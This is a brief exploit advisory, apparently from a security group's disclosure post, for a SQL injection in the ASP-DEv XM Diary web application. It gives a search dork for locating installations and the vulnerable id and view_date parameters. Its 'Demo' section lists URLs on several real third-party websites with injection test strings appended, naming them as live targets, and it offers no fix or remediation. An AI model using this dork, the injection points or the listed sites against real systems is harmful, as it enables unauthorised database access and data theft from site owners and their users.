ASP-DEv XM Diary suffers from a remote SQL injection vulnerability.
cf3c509b6e8491ab677d96ab6563bf4efd4aa8af7b4e2db270f22deffd6bef71
########################################################################################
# #
# Exploit Title : ASP-DEv XM Diary SQL Injection Vulnerability #
# #
# Author : Secure-Land Security Team #
# #
# Discovered By : farbodmahini #
# #
# Home : Secure-Land.net #
# #
# Version : All Version #
# #
# Software Link : http://www.asp-dev.com/download.asp?did=2 #
# #
# Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com #
# #
# Security Risk : High #
# #
# DorK : "Powered by ASP-DEv XM Diary" #
# #
# #
########################################################################################
# #
# Expl0iT: #
# #
# http://[TarGeT]/[patch]/diary_view.asp?id=[SQL] #
# http://[TarGeT]/[patch]/default.asp?view_date=[SQL] #
# #
# #
# Demo : #
# #
# http://www.suffolkwaterpark.com/event_diary/default.asp?view_date=40142' #
# http://www.suffolkwaterpark.com/event_diary/diary_view.asp?id=301' #
# http://www.cci.ca/NORTHALBERTA/EVENTS/diary_view.asp?id=133' #
# http://www.knoebels.com/calendar/diary_view.asp?id=545' #
# #
########################################################################################
# #
# Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us #
# #
########################################################################################
# #
# Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id #
# #
########################################################################################